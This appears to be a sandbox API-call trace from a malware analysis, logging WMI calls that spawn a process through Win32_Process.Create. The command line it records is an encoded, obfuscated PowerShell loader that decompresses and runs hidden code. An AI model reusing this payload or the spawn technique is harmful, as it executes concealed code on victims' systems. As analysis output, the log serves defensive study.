WbemLocator:IClientSecurity:CopyProxy (in: This=0xafa45d0, pProxy=0xd115498, ppCopy=0x146008 | out: ppCopy=0x146008*=0xd101788) returned 0x0 [0070.715] WbemLocator:IUnknown:QueryInterface (in: This=0xd101788, riid=0x7fee2a81628*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x145ec0 | out: ppvObject=0x145ec0*=0xafa45d0) returned 0x0 [0070.715] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xafa45d0, pProxy=0xd101788, pAuthnSvc=0x145f60, pAuthzSvc=0x145f10, pServerPrincName=0x0, pAuthnLevel=0x0, pImpLevel=0x0, pAuthInfo=0x0, pCapabilites=0x0 | out: pAuthnSvc=0x145f60*=0xa, pAuthzSvc=0x145f10*=0x0, pServerPrincName=0x0, pAuthnLevel=0x0, pImpLevel=0x0, pAuthInfo=0x0, pCapabilites=0x0) returned 0x0 [0070.715] WbemLocator:IUnknown:Release (This=0xafa45d0) returned 0x3 [0070.715] WbemLocator:IUnknown:QueryInterface (in: This=0xd101788, riid=0x7fee2a81568*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x145e80 | out: ppvObject=0x145e80*=0xafa4610) returned 0x0 [0070.715] WbemLocator:IUnknown:QueryInterface (in: This=0xd101788, riid=0x7fee2a81628*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x145ec0 | out: ppvObject=0x145ec0*=0xafa45d0) returned 0x0 [0070.715] WbemLocator:IClientSecurity:SetBlanket (This=0xafa45d0, pProxy=0xd101788, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0070.716] WbemLocator:IUnknown:Release (This=0xafa45d0) returned 0x4 [0070.716] WbemLocator:IUnknown:Release (This=0xafa4610) returned 0x3 [0070.716] WbemLocator:IUnknown:Release (This=0xafa45d0) returned 0x2 [0070.716] WbemLocator:IUnknown:AddRef (This=0xd101788) returned 0x3 [0070.716] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd115e60 [0070.716] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd1154b0 [0070.716] WbemLocator:IUnknown:Release (This=0xd115498) returned 0x2 [0070.716] WbemLocator:IUnknown:QueryInterface (in: This=0xd101788, riid=0x7fee2a81628*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1461a8 | out: ppvObject=0x1461a8*=0xafa45d0) returned 0x0 [0070.716] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xafa45d0, pProxy=0xd101788, pAuthnSvc=0x1461a0, pAuthzSvc=0x1461e8, pServerPrincName=0x0, pAuthnLevel=0x146210, pImpLevel=0x146208, pAuthInfo=0x0, pCapabilites=0x1461d8 | out: pAuthnSvc=0x1461a0*=0xa, pAuthzSvc=0x1461e8*=0x0, pServerPrincName=0x0, pAuthnLevel=0x146210*=0x6, pImpLevel=0x146208*=0x3, pAuthInfo=0x0, pCapabilites=0x1461d8*=0x20) returned 0x0 [0070.716] WbemLocator:IUnknown:Release (This=0xafa45d0) returned 0x2 [0070.716] WbemDefPath:IWbemPath:GetInfo (in: This=0xd1013d0, uRequestedInfo=0x0, puResponse=0x146210 | out: puResponse=0x146210*=0xc15) returned 0x0 [0070.716] WbemDefPath:IWbemPath:GetText (in: This=0xd1013d0, lFlags=2, puBuffLength=0x146240*=0x0, pszText=0x0 | out: puBuffLength=0x146240*=0xe, pszText=0x0) returned 0x0 [0070.716] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd111b20 [0070.716] WbemDefPath:IWbemPath:GetText (in: This=0xd1013d0, lFlags=2, puBuffLength=0x146240*=0xe, pszText="8ﬡ߾" | out: puBuffLength=0x146240*=0xe, pszText="Win32_Process") returned 0x0 [0070.716] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0070.716] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0070.716] GetCurrentThreadId () returned 0x8ec [0070.717] WbemLocator:IUnknown:AddRef (This=0xd101788) returned 0x3 [0070.717] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0070.717] GetCurrentThreadId () returned 0x8ec [0070.717] IWbemServices:GetObject (in: This=0xd101788, strObjectPath="Win32_Process", lFlags=0, pCtx=0x0, ppObject=0x146208*=0x0, ppCallResult=0x0 | out: ppObject=0x146208*=0xd11af70, ppCallResult=0x0) returned 0x0 [0070.752] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd11b2e0 [0070.752] IUnknown:AddRef (This=0xd11af70) returned 0x2 [0070.752] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd11b360 [0070.752] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd11b410 [0070.752] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd11b4b0 [0070.752] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd11b550 [0070.752] WbemLocator:IUnknown:AddRef (This=0xd101788) returned 0x4 [0070.752] SysStringLen (param_1="\\\\.\\root\\cimv2") returned 0xe [0070.752] IUnknown:AddRef (This=0xd11af70) returned 0x3 [0070.752] IUnknown:Release (This=0xd11af70) returned 0x2 [0070.752] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x146160 | out: pperrinfo=0x146160*=0x0) returned 0x1 [0070.752] WbemLocator:IUnknown:Release (This=0xd101788) returned 0x3 [0070.752] CreatePointerMoniker (in: punk=0xd11b2e0, ppmk=0x1464b0 | out: ppmk=0x1464b0*=0x6983270) returned 0x0 [0070.752] IUnknown:AddRef (This=0xd11b2e0) returned 0x2 [0070.753] WbemLocator:IUnknown:Release (This=0xd101788) returned 0x2 [0070.753] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0070.753] WbemLocator:IUnknown:Release (This=0xd111aa0) returned 0x0 [0070.753] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0070.753] WinMGMTS:IUnknown:Release (This=0xd1118f0) returned 0x0 [0070.753] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0070.753] BindMoniker (in: pmk=0x6983270, grfOpt=0x0, iidResult=0x7fee3b17890*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvResult=0x146538 | out: ppvResult=0x146538*=0xd11b2e0) returned 0x0 [0070.753] IUnknown:QueryInterface (in: This=0xd11b2e0, riid=0x7fee3b17890*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x146538 | out: ppvObject=0x146538*=0xd11b2e0) returned 0x0 [0070.753] IUnknown:Release (This=0x6983270) returned 0x0 [0070.753] IUnknown:Release (This=0xd11b2e0) returned 0x1 [0070.753] LoadRegTypeLib (in: rguid=0x7fee2a817a8*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x1464d0*=0x0 | out: pptlib=0x1464d0*=0x3f14330) returned 0x0 [0070.758] ITypeLib:GetTypeInfoOfGuid (in: This=0x3f14330, GUID=0x7fee2a81908, ppTInfo=0xd112c60 | out: ppTInfo=0xd112c60*=0xaff2848) returned 0x0 [0070.758] IUnknown:Release (This=0x3f14330) returned 0x2 [0070.758] IUnknown:AddRef (This=0xaff2848) returned 0x3 [0070.758] DispGetIDsOfNames (in: ptinfo=0xaff2848, rgszNames=0x1465c0*="Create", cNames=0x1, rgdispid=0x1465a4 | out: rgdispid=0x1465a4*=-1) returned 0x80020006 [0070.758] IUnknown:AddRef (This=0xd11af70) returned 0x3 [0070.758] IWbemClassObject:Get (in: This=0xd11af70, wszName="Create", lFlags=0, pVal=0x0, pType=0x0, plFlavor=0x146500*=0 | out: pVal=0x0, pType=0x0, plFlavor=0x146500*=0) returned 0x80041002 [0070.758] IUnknown:Release (This=0xd11af70) returned 0x2 [0070.758] IWbemClassObject:Get (in: This=0xd11af70, wszName="__GENUS", lFlags=0, pVal=0x146340*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x146340*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0070.758] IUnknown:AddRef (This=0xd11af70) returned 0x3 [0070.758] IUnknown:AddRef (This=0xd11af70) returned 0x4 [0070.758] IWbemClassObject:GetMethod (in: This=0xd11af70, wszName="Create", lFlags=0, ppInSignature=0x146430, ppOutSignature=0x146438 | out: ppInSignature=0x146430*=0xd11bcd0, ppOutSignature=0x146438*=0xd11c4a0) returned 0x0 [0070.758] IWbemClassObject:GetNames (in: This=0xd11bcd0, wszQualifierName=0x0, lFlags=0, pQualifierVal=0x0, pNames=0x146448 | out: pNames=0x146448*="\x01ƀ\x08") returned 0x0 [0070.759] IWbemClassObject:GetNames (in: This=0xd11c4a0, wszQualifierName=0x0, lFlags=0, pQualifierVal=0x0, pNames=0x146440 | out: pNames=0x146440*="\x01ƀ\x08") returned 0x0 [0070.759] IUnknown:Release (This=0xd11af70) returned 0x3 [0070.759] SysStringLen (param_1="Create") returned 0x6 [0070.759] IUnknown:Release (This=0xd11c4a0) returned 0x0 [0070.759] IUnknown:Release (This=0xd11bcd0) returned 0x0 [0070.759] IUnknown:Release (This=0xaff2848) returned 0x2 [0070.760] IWbemClassObject:GetMethod (in: This=0xd11af70, wszName="Create", lFlags=0, ppInSignature=0x146328, ppOutSignature=0x146330 | out: ppInSignature=0x146328*=0xd11bcd0, ppOutSignature=0x146330*=0xd11c4a0) returned 0x0 [0070.760] IWbemClassObject:SpawnInstance (in: This=0xd11bcd0, lFlags=0, ppNewInstance=0x146338 | out: ppNewInstance=0x146338*=0xd1013d0) returned 0x0 [0070.760] IWbemClassObject:BeginEnumeration (This=0xd11bcd0, lEnumFlags=64) returned 0x0 [0070.760] IWbemClassObject:Next (in: This=0xd11bcd0, lFlags=0, strName=0x1462f8*=0x0, pVal=0x0, pType=0x1462f0*=4, plFlavor=0x0 | out: strName=0x1462f8*="CommandLine", pVal=0x0, pType=0x1462f0*=8, plFlavor=0x0) returned 0x0 [0070.760] IWbemClassObject:GetPropertyQualifierSet (in: This=0xd11bcd0, wszProperty="CommandLine", ppQualSet=0x146270 | out: ppQualSet=0x146270*=0xd101830) returned 0x0 [0070.760] IWbemQualifierSet:Get (in: This=0xd101830, wszName="id", lFlags=0, pVal=0x146290*(varType=0x0, wReserved1=0x14, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fee2a99bd4, varVal2=0x1462e8), plFlavor=0x0 | out: pVal=0x146290*(varType=0x3, wReserved1=0x14, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000000, varVal2=0x1462e8), plFlavor=0x0) returned 0x0 [0070.761] IWbemClassObject:Put (This=0xd1013d0, wszName="CommandLine", lFlags=0, pVal=0x146278*(varType=0x8, wReserved1=0xf557, wReserved2=0x7fe, wReserved3=0x0, varVal1="powershell -e KAAgAG4ARQB3AC0ATwBCAEoAZQBjAFQAIAAgAGkATwAuAHMAVABSAEUAYQBNAFIAZQBhAGQAZQBSACgAKAAgAG4ARQB3AC0ATwBCAEoAZQBjAFQAIABJAE8ALgBjAG8AbQBwAHIARQBTAHMAaQBPAE4ALgBEAEUAZgBsAGEAVABFAHMAdAByAGUAYQBNACgAIABbAGkAbwAuAG0ARQBNAG8AUgBZAFMAdAByAGUAYQBNAF0AIABbAEMAbwBuAFYAZQByAFQAXQA6ADoAZgBSAE8ATQBCAEEAcwBlADYANABzAFQAcgBJAE4AZwAoACgAJwBYAFoASgBSAGIANQBzACcAKwAnAHcAJwArACcARQAnACsAJwBNAGUALwAnACsAJwBDAGcAJwArACcAOQBJAFQAcABRAEIAaQA4AFIARABWACcAKwAnADQAJwArACcAVABVAGMAMQBoAFEAWAAnACsAJwByAGEAaABGACcAKwAnAFEAVwBoACcAKwAnAFMAaABWAHgARABuACcAKwAnAEMAZwBOACcAKwAnAHMAJwArACcASQBPACcAKwAnAHoAaAAnACsAJwBUAGwAdQAnACsAJwA4AC8AWgAyAGsAYQB0ACcAKwAnAEgANgAnACsAJwAzAGYALwBjAC8AMwBPACcAKwAnADcAJwArACcAdgAnACsAJwBWAGMAJwArACcANQBkAEIAJwArACcAQQBtACcAKwAnAEYATQB1ACcAKwAnAGkAVgBBAGIAcQBBAGoAawAnACsAJwBUAHQAJwArACcAawBZAEUANABRAEMAegBTAGUAMwBCADIAUQBhAGUAYwBIAGEAbgArAEwAdQAxAFgAUABVAGUAagAnACsAJwBJAEwAUgBpAEYAegAnACsAJwBCAEsAawAxAFgAcQAnACsAJwA0ACcAKwAnAEQANAAnACsAJwBJACcAKwAnAGUAbABjACcAKwAnAEsAeABVAGsAJwArACcAbwB5AFgAbQBsAFUAUABwAE0AJwArACcAdgBnAFIAJwArACcAawA4ACcAKwAnAEoAbwBXADIAJwArACcAQgAnACsAJwBjAEgAMwB1AHoAJwArACcAWgAnACsAJwA0AGUARwBWACcAKwAnAHIAJwArACcATwBlAEoAcAAnACsAJwBHAEsAVQB0AG0ARABqAEQAegA2AGoAZQB2AHAATwBDACcAKwAnADQAOQAnACsAJwBHACcAKwAnADAAcwB0AGIAWQBZAEcAOQB3ACcAKwAnADcARgBEADQAbwBnACcAKwAnACsAYQBiAHgAQgBzAEQALwA4ACcAKwAnAHAAWgBiAEcAJwArACcAagAnACsAJwA0AEUASwBPACcAKwAnAEcAdgAnACsAJwBkACcAKwAnADgAdwBsACcAKwAnAEgASgBmADQARwBWAFUAYgByAFMAaQB0AHQAVQAnACsAJwBGAFcAJwArACcAUwBQAEwAJwArACcAYgB2AGgARQAyACcAKwAnAC8AJwArACcAawA2ACcAKwAnAE8AMwBIAHEAcABIAGkAYwAnACsAJwAvAFAAZAA1AG0AJwArACcAZABBAC8ATgA5AEQAegAvAFcATQBQAEoAQgA1ACcAKwAnADUATgBiADUAOABqAGwAUABZADMASwAnACsAJwBnAFkASgBLAFMAVwBqACcAKwAnAG0AeQBLADIAJwArACcAawBLAFcAZQAnACsAJwBqAEUARAAnACsAJwBnAG4AdgA3ACcAKwAnAEUAVQB1AE8AMQBwAFEASwBHAE8AUwAnACsAJwBXACcAKwAnAHAAJwArACcATQAwAFMAYQA0ACcAKwAnAEsAJwArACcAZgAnACsAJwB3AEcAcwBBAEoATAAnACsAJwBZAFIAVABIAGQASAArADIAcwBkAHUASwBhACcAKwAnADkANwBnAGcAVAAyAFQAeABuAHIARQBnAFAAcAAnACsAJwA2ACcAKwAnAFEAUgBGAGMAbgBGAFcAdABuACcAKwAnADcAJwArACcAcgBwAFkAbgBvAEIAbQBoAGMATwBGADgAJwArACcAMgBaACcAKwAnADUAZgB0ACcAKwAnAGIAagBuAC8AUAByACcAKwAnAFUAdgB4AEUARwB0ACcAKwAnAEgATABhAHIAJwArACcAKwAyACcAKwAnAFkAVABmACcAKwAnACsAJwArACcAaQAnACsAJwAvAFAAVwAwAGIANQAnACsAJwA1AEQAVwAnACsAJwBYAEcAawBqAHcAJwArACcAbQBEAEYASwBnAGUAVgBHAFEAYQBGAE0AJwArACcANwBzADEAbQBLACcAKwAnADIAdAB0AG8AZgBMAG0AeAAnACsAJwBmAG8AJwArACcAKwBpACcAKwAnADAAYQAzAGoATgBlACcAKwAnAGkARQBYACsAJwArACcAMgBaACcAKwAnAE8AKwBlAE4AbQBHAFMASABIADAARwA3AGMAVABBAGgAbQBKACcAKwAnAGgAVQBLACcAKwAnAFEARABRAGsAawBRADcAKwArAEkAdQB1AGwAeABZAHAAVgBsADcAdgBsAHoAYwBSADYAQwAwAHMAJwArACcANgAnACsAJwBaAFcAawBGADkALwBGAEkAbgArAEEAJwArACcAZwA9AD0AJwApACAAKQAsAFsASQBvAC4AYwBvAG0AUABSAGUAUwBTAGkAbwBuAC4AYwBPAE0AUABSAGUAcwBzAGkATwBOAE0AbwBEAEUAXQA6ADoAZABFAGMAbwBNAHAAUgBFAFMAcwAgACkAIAApACAALABbAHQAZQBYAHQALgBlAG4AQwBPAGQASQBOAEcAXQA6ADoAYQBTAEMAaQBpACkAKQAuAHIARQBhAGQAVABPAEUAbgBkACgAIAApACAAfAAmACgAIAAkAFYARQByAEIATwBTAEUAcAByAGUARgBFAFIAZQBOAGMAZQAuAHQATwBTAFQAcgBpAE4ARwAoACkAWwAxACwAMwBdACsAJwBYACcALQBqAG8ASQBuACcAJwApAA==", varVal2=0x146328), Type=0) returned 0x0 [0070.761] IUnknown:Release (This=0xd101830) returned 0x0 [0070.761] IWbemClassObject:Next (in: This=0xd11bcd0, lFlags=0, strName=0x1462f8*=0x0, pVal=0x0, pType=0x1462f0*=8, plFlavor=0x0 | out: strName=0x1462f8*="CurrentDirectory", pVal=0x0, pType=0x1462f0*=8, plFlavor=0x0) returned 0x0 [0070.761] IWbemClassObject:GetPropertyQualifierSet (in: This=0xd11bcd0, wszProperty="CurrentDirectory", ppQualSet=0x146270 | out: ppQualSet=0x146270*=0xd101830) returned 0x0 [0070.762] IWbemQualifierSet:Get (in: This=0xd101830, wszName="id", lFlags=0, pVal=0x146290*(varType=0x0, wReserved1=0x14, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000000, varVal2=0x1462e8), plFlavor=0x0 | out: pVal=0x146290*(varType=0x3, wReserved1=0x14, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000001, varVal2=0x1462e8), plFlavor=0x0) returned 0x0 [0070.762] IWbemClassObject:Put (This=0xd1013d0, wszName="CurrentDirectory", lFlags=0, pVal=0x146278*(varType=0x1, wReserved1=0xf557, wReserved2=0x7fe, wReserved3=0x0, varVal1=0xb049a28, varVal2=0x146328), Type=0) returned 0x0 [0070.762] IUnknown:Release (This=0xd101830) returned 0x0 [0070.762] IWbemClassObject:Next (in: This=0xd11bcd0, lFlags=0, strName=0x1462f8*=0x0, pVal=0x0, pType=0x1462f0*=8, plFlavor=0x0 | out: strName=0x1462f8*="ProcessStartupInformation", pVal=0x0, pType=0x1462f0*=13, plFlavor=0x0) returned 0x0 [0070.762] IWbemClassObject:GetPropertyQualifierSet (in: This=0xd11bcd0, wszProperty="ProcessStartupInformation", ppQualSet=0x146270 | out: ppQualSet=0x146270*=0xd101830) returned 0x0 [0070.762] IWbemQualifierSet:Get (in: This=0xd101830, wszName="id", lFlags=0, pVal=0x146290*(varType=0x0, wReserved1=0x14, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000001, varVal2=0x1462e8), plFlavor=0x0 | out: pVal=0x146290*(varType=0x3, wReserved1=0x14, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000002, varVal2=0x1462e8), plFlavor=0x0) returned 0x0 [0070.762] IUnknown:AddRef (This=0xd115090) returned 0x2 [0070.762] IUnknown:AddRef (This=0xd114d20) returned 0x3 [0070.762] IWbemClassObject:Put (This=0xd1013d0, wszName="ProcessStartupInformation", lFlags=0, pVal=0x146278*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd114d20, varVal2=0x0), Type=0) returned 0x0 [0070.763] IUnknown:Release (This=0xd101830) returned 0x0 [0070.763] IWbemClassObject:Next (in: This=0xd11bcd0, lFlags=0, strName=0x1462f8*=0x0, pVal=0x0, pType=0x1462f0*=13, plFlavor=0x0 | out: strName=0x1462f8*=0x0, pVal=0x0, pType=0x1462f0*=13, plFlavor=0x0) returned 0x40005 [0070.763] WbemLocator:IUnknown:AddRef (This=0xd101788) returned 0x3 [0070.763] IWbemClassObject:Get (in: This=0xd11af70, wszName="__RELPATH", lFlags=0, pVal=0x146358*(varType=0x0, wReserved1=0xe2a9, wReserved2=0x7fe, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x7fefb221083), pType=0x0, plFlavor=0x0 | out: pVal=0x146358*(varType=0x8, wReserved1=0xe2a9, wReserved2=0x7fe, wReserved3=0x0, varVal1="Win32_Process", varVal2=0x7fefb221083), pType=0x0, plFlavor=0x0) returned 0x0 [0070.763] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0070.763] GetCurrentThreadId () returned 0x8ec [0070.763] IWbemServices:ExecMethod (in: This=0xd101788, strObjectPath="Win32_Process", strMethodName="Create", lFlags=0, pCtx=0x0, pInParams=0xd1013d0, ppOutParams=0x146340*=0x0, ppCallResult=0x0 | out: ppOutParams=0x146340*=0xd1210b0, ppCallResult=0x0) returned 0x0 [0071.781] IWbemClassObject:BeginEnumeration (This=0xd11c4a0, lEnumFlags=64) returned 0x0 [0071.781] IWbemClassObject:Next (in: This=0xd11c4a0, lFlags=0, strName=0x1462f0*=0x0, pVal=0x0, pType=0x0, plFlavor=0x0 | out: strName=0x1462f0*="ProcessId", pVal=0x0, pType=0x0, plFlavor=0x0) returned 0x0 [0071.781] IWbemClassObject:Get (in: This=0xd1210b0, wszName="ProcessId", lFlags=0, pVal=0x146268*(varType=0x0, wReserved1=0x68e, wReserved2=0x0, wReserved3=0x0, varVal1=0x6831eb8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x146268*(varType=0x3, wReserved1=0x68e, wReserved2=0x0, wReserved3=0x0, varVal1=0xb08, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0071.781] _wcsicmp (_String1="ProcessId", _String2="ReturnValue") returned -2 [0071.781] IWbemClassObject:GetPropertyQualifierSet (in: This=0xd11c4a0, wszProperty="ProcessId", ppQualSet=0x146260 | out: ppQualSet=0x146260*=0xd101830) returned 0x0 [0071.781] IWbemQualifierSet:Get (in: This=0xd101830, wszName="id", lFlags=0, pVal=0x146298*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x68e4a48), plFlavor=0x0 | out: pVal=0x146298*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffffffff00000003, varVal2=0x68e4a48), plFlavor=0x0) returned 0x0 [0071.781] IUnknown:Release (This=0xd101830) returned 0x0 [0071.782] IWbemClassObject:Next (in: This=0xd11c4a0, lFlags=0, strName=0x1462f0*=0x0, pVal=0x0, pType=0x0, plFlavor=0x0 | out: strName=0x1462f0*="ReturnValue", pVal=0x0, pType=0x0, plFlavor=0x0) returned 0x0 [0071.782] IWbemClassObject:Get (in: This=0xd1210b0, wszName="ReturnValue", lFlags=0, pVal=0x146268*(varType=0x0, wReserved1=0x68e, wReserved2=0x0, wReserved3=0x0, varVal1=0xb08, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x146268*(varType=0x3, wReserved1=0x68e, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0071.782] _wcsicmp (_String1="ReturnValue", _String2="ReturnValue") returned 0 [0071.782] IWbemClassObject:Next (in: This=0xd11c4a0, lFlags=0, strName=0x1462f0*=0x0, pVal=0x0, pType=0x0, plFlavor=0x0 | out: strName=0x1462f0*=0x0, pVal=0x0, pType=0x0, plFlavor=0x0) returned 0x40005 [0071.782] IUnknown:Release (This=0xd1210b0) returned 0x0 [0071.782] WbemLocator:IUnknown:Release (This=0xd101788) returned 0x2 [0071.782] IUnknown:Release (This=0xd1013d0) returned 0x0 [0071.782] IUnknown:Release (This=0xd11c4a0) returned 0x0 [0071.782] IUnknown:Release (This=0xd11bcd0) returned 0x0 [0071.782] IUnknown:Release (This=0xd11af70) returned 0x2 [0071.782] WbemLocator:IUnknown:Release (This=0xd101788) returned 0x1 [0071.782] WbemLocator:IUnknown:Release (This=0xd101788) returned 0x0 [0071.783] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0071.784] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0071.784] IUnknown:Release (This=0xd11af70) returned 0x1 [0071.784] IUnknown:Release (This=0xd11af70) returned 0x0 [0071.784] IUnknown:Release (This=0xaff2848) returned 0x1 [0071.784] VarCmp (pvarLeft=0xaefe550, pvarRight=0xaefe538, lcid=0x0, dwFlags=0x30001) returned 0x1 [0071.784] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe520, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0071.784] sqrt (_X=0x3) returned 0x41b0000000000000 [0071.784] VarDiv (in: pvarLeft=0xaefe4f0, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0071.784] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0071.784] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0071.784] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe478, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0071.784] VarCmp (pvarLeft=0xaefe448, pvarRight=0xaefe430, lcid=0x0, dwFlags=0x30001) returned 0x1 [0071.784] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe418, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0071.784] sqrt (_X=0x3) returned 0x41c0000000000000 [0071.784] VarDiv (in: pvarLeft=0xaefe3e8, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0071.784] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0071.784] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0071.784] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe370, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0071.784] VarCmp (pvarLeft=0xaefe340, pvarRight=0xaefe328, lcid=0x0, dwFlags=0x30001) returned 0x1 [0071.784] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe310, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0071.784] sqrt (_X=0x3) returned 0x41c0000000000000 [0071.784] VarDiv (in: pvarLeft=0xaefe2e0, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0071.784] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0071.784] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0071.784] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe268, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0071.785] IUnknown:Release (This=0xd114d20) returned 0x1 [0071.785] WbemLocator:IUnknown:Release (This=0xd113fe8) returned 0x1 [0071.785] WbemLocator:IUnknown:Release (This=0xd113fe8) returned 0x0 [0071.808] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0071.808] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0071.808] IUnknown:Release (This=0xd114d20) returned 0x0 [0071.808] IUnknown:Release (This=0xaff2848) returned 0x0 [0071.810] VarCmp (pvarLeft=0xaeffa28, pvarRight=0xaeffa10, lcid=0x0, dwFlags=0x30001) returned 0x1 [0071.810] VarMul (in: pvarLeft=0xaf00000, pvarRight=0xaeff9f8, pvarResult=0xaf00030 | out: pvarResult=0xaf00030) returned 0x0 [0071.810] sqrt (_X=0x3) returned 0x41c0000000000000 [0071.810] VarDiv (in: pvarLeft=0xaeff9c8, pvarRight=0xaf00000, pvarResult=0xaf00030 | out: pvarResult=0xaf00030) returned 0x0 [0071.810] VarDiv (in: pvarLeft=0xaf00030, pvarRight=0xaefffb8, pvarResult=0xaefffa0 | out: pvarResult=0xaefffa0) returned 0x0 [0071.810] RtlUnwindEx (TargetFrame=0x1467c0, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x1468d0, ContextRecord=0x146230, HistoryTable=0x0) [0071.810] VarMul (in: pvarLeft=0xaf00000, pvarRight=0xaeff950, 